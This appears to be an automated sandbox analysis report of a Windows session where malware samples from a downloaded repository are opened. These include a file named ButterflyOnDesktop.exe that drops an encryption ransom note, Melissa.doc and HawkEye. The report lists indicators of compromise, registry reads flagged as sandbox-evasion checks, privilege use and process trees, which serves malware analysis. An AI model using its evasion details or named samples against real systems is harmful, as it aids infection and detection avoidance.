File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\hu-hu\YOUR_FILES_ARE_ENCRYPTED.HTML | ButterflyOnDesktop.exe
File opened for modification | C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.targetsize-80_contrast-white.png | ButterflyOnDesktop.exe
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\sign-in-2x.png | ButterflyOnDesktop.exe
File opened for modification | C:\Program Files\WindowsApps\Microsoft.ScreenSketch_10.1907.2471.0_x64__8wekyb3d8bbwe\Assets\ScreenSketchSquare44x44Logo.targetsize-72_contrast-black.png | ButterflyOnDesktop.exe
File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1906.2182.0_x64__8wekyb3d8bbwe\Assets\StopwatchSmallTile.contrast-black_scale-200.png | ButterflyOnDesktop.exe
File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.targetsize-16_altform-unplated_contrast-white.png | ButterflyOnDesktop.exe
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\server_lg.gif | ButterflyOnDesktop.exe
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-tools.jar | ButterflyOnDesktop.exe
File opened for modification | C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\Assets\contrast-black\StoreLogo.scale-125_contrast-black.png | ButterflyOnDesktop.exe
File opened for modification | C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\Assets\contrast-black\SplashScreen.scale-125_contrast-black.png | ButterflyOnDesktop.exe
File opened for modification | C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\Assets\Images\Stickers\Sticker_Glasses.png | ButterflyOnDesktop.exe
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\icons_retina.png | ButterflyOnDesktop.exe
File opened for modification | C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-black\OneNoteAppList.targetsize-32.png | ButterflyOnDesktop.exe
File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\OutlookMailMediumTile.scale-200.png | ButterflyOnDesktop.exe
File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\LinkedInboxLargeTile.scale-100.png | ButterflyOnDesktop.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
Program crash 1 IoCs
pid | pid_target | Process | procid_target
2160 | 648 | WerFault.exe | 166
Checks SCSI registry key(s) 3 TTPs 12 IoCs
SCSI information is often read in order to detect sandboxing environments.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | taskmgr.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | taskmgr.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 | taskmgr.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | taskmgr.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 | taskmgr.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 | taskmgr.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 | taskmgr.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | taskmgr.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | taskmgr.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | taskmgr.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | taskmgr.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | taskmgr.exe
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
- Key opened: \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 (WINWORD.EXE, 2 entries)
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz (WINWORD.EXE, 2 entries)
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString (WINWORD.EXE, 2 entries)
Enumerates system info in registry 2 TTPs 18 IoCs
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer (msedge.exe, 4 entries)
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName (msedge.exe, 4 entries)
- Key opened: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS (msedge.exe, 4 entries)
- Key opened: \REGISTRY\MACHINE\Hardware\Description\System\BIOS (WINWORD.EXE, 2 entries)
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU (WINWORD.EXE, 2 entries)
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily (WINWORD.EXE, 2 entries)
Modifies registry class 2 IoCs
- Key created: \REGISTRY\USER\S-1-5-21-1859779917-101786662-3680946609-1000_Classes\Local Settings (msedge.exe)
- Key created: \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1859779917-101786662-3680946609-1000\{69060BEB-0081-48B3-B508-134F3A2BF73E} (msedge.exe)
Suspicious behavior: AddClipboardFormatListener 4 IoCs
- 772 WINWORD.EXE (2 entries); 648 WINWORD.EXE (2 entries)
Suspicious behavior: EnumeratesProcesses 64 IoCs
- 1176 msedge.exe (2 entries); 2676 msedge.exe (3); 4588 identity_helper.exe (2); 4812 msedge.exe (4); 3900 msedge.exe (2); 2700 msedge.exe (2); 2848 taskmgr.exe (the remaining 49 of the 64 entries)
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
- 2848 taskmgr.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 38 IoCs
- 2676 msedge.exe (25 entries); 2388 msedge.exe (3); 4600 msedge.exe (6); 3484 msedge.exe (4); 38 entries in total
Suspicious use of AdjustPrivilegeToken 24 IoCs
- 7zG.exe (PID 3400): Token: SeRestorePrivilege, Token: 35, Token: SeSecurityPrivilege (2 entries)
- taskmgr.exe (PID 2848): Token: SeDebugPrivilege, SeSystemProfilePrivilege, SeCreateGlobalPrivilege, 33, SeIncBasePriorityPrivilege
- powershell.exe (PID 4180): Token: SeDebugPrivilege
- HawkEye.exe (PID 4744): Token: SeDebugPrivilege
- taskmgr.exe (PID 4736): Token: SeDebugPrivilege, SeSystemProfilePrivilege, SeCreateGlobalPrivilege, 33, SeIncBasePriorityPrivilege
- taskmgr.exe (PID 3892): Token: SeDebugPrivilege, SeSystemProfilePrivilege, SeCreateGlobalPrivilege, 33, SeIncBasePriorityPrivilege
- taskmgr.exe (PID 684): Token: SeDebugPrivilege, SeSystemProfilePrivilege, SeCreateGlobalPrivilege
Suspicious use of FindShellTrayWindow 64 IoCs
- 2676 msedge.exe (all 64 entries)
Suspicious use of SendNotifyMessage 64 IoCs
- 2676 msedge.exe, followed by 2848 taskmgr.exe (64 entries in total)
Suspicious use of SetWindowsHookEx 22 IoCs
- 772 WINWORD.EXE (15 entries); 648 WINWORD.EXE (7 entries)
Suspicious use of WriteProcessMemory 64 IoCs
- PID 2676 (msedge.exe) wrote to memory of PID 3432, procid_target 100 (2 entries)
- PID 2676 (msedge.exe) wrote to memory of PID 4784, procid_target 101
- PID 2676 (msedge.exe) wrote to memory of PID 1176, procid_target 102 (2 entries)
- PID 2676 (msedge.exe) wrote to memory of PID 2912, procid_target 103
- 64 entries in total; all but four are repeats of the 4784 and 2912 records
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\Captura de pantalla 2023-03-05 184332.png"1⤵PID:1956
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2676 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffe56dd46f8,0x7ffe56dd4708,0x7ffe56dd47182⤵PID:3432
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2148,241237471753280816,3577529835992422707,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2176 /prefetch:22⤵PID:4784
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2148,241237471753280816,3577529835992422707,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2244 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:1176
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2148,241237471753280816,3577529835992422707,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2976 /prefetch:82⤵PID:2912
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,241237471753280816,3577529835992422707,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3432 /prefetch:12⤵PID:4656
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,241237471753280816,3577529835992422707,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3400 /prefetch:12⤵PID:4892
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,241237471753280816,3577529835992422707,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5020 /prefetch:12⤵PID:4824
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,241237471753280816,3577529835992422707,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4976 /prefetch:12⤵PID:4188
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2148,241237471753280816,3577529835992422707,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3396 /prefetch:82⤵PID:648
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2148,241237471753280816,3577529835992422707,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3396 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:4588
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,241237471753280816,3577529835992422707,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5308 /prefetch:12⤵PID:2200
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,241237471753280816,3577529835992422707,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5304 /prefetch:12⤵PID:1816
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,241237471753280816,3577529835992422707,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4956 /prefetch:12⤵PID:1600
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,241237471753280816,3577529835992422707,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4204 /prefetch:12⤵PID:1696
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,241237471753280816,3577529835992422707,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5644 /prefetch:12⤵PID:2268
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,241237471753280816,3577529835992422707,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5792 /prefetch:12⤵PID:4088
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,241237471753280816,3577529835992422707,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5856 /prefetch:12⤵PID:1128
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,241237471753280816,3577529835992422707,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6084 /prefetch:12⤵PID:436
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2148,241237471753280816,3577529835992422707,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=6108 /prefetch:82⤵PID:4952
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,241237471753280816,3577529835992422707,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3572 /prefetch:12⤵PID:4780
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2148,241237471753280816,3577529835992422707,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5204 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
PID:4812
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2148,241237471753280816,3577529835992422707,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=4140 /prefetch:82⤵PID:4748
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2148,241237471753280816,3577529835992422707,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6064 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:3900
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,241237471753280816,3577529835992422707,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3764 /prefetch:12⤵PID:4168
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,241237471753280816,3577529835992422707,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5676 /prefetch:12⤵PID:4644
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2148,241237471753280816,3577529835992422707,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=2648 /prefetch:82⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
PID:2700
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2148,241237471753280816,3577529835992422707,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=2356 /prefetch:82⤵PID:812
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,241237471753280816,3577529835992422707,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4984 /prefetch:12⤵PID:3480
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,241237471753280816,3577529835992422707,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5652 /prefetch:12⤵PID:3560
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,241237471753280816,3577529835992422707,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4968 /prefetch:12⤵PID:4776
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,241237471753280816,3577529835992422707,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2744 /prefetch:12⤵PID:3784
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2148,241237471753280816,3577529835992422707,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5968 /prefetch:82⤵PID:1072
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,241237471753280816,3577529835992422707,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5872 /prefetch:12⤵PID:1124
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,241237471753280816,3577529835992422707,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5584 /prefetch:12⤵PID:416
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,241237471753280816,3577529835992422707,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5156 /prefetch:12⤵PID:4244
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,241237471753280816,3577529835992422707,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3172 /prefetch:12⤵PID:4748
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,241237471753280816,3577529835992422707,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6920 /prefetch:12⤵PID:520
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,241237471753280816,3577529835992422707,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6816 /prefetch:12⤵PID:1452
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:116
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4308
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:3840
-
C:\Windows\system32\rundll32.exeC:\Windows\system32\rundll32.exe C:\Windows\system32\PcaSvc.dll,PcaPatchSdbTask1⤵PID:2924
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\The-MALWARE-Repo-master\" -ad -an -ai#7zMap14023:108:7zEvent302741⤵
- Suspicious use of AdjustPrivilegeToken
PID:3400
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\Downloads\here\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Virus\Melissa.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:772
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SendNotifyMessage
PID:2848
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\here\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\BonziKill.txt1⤵PID:2780
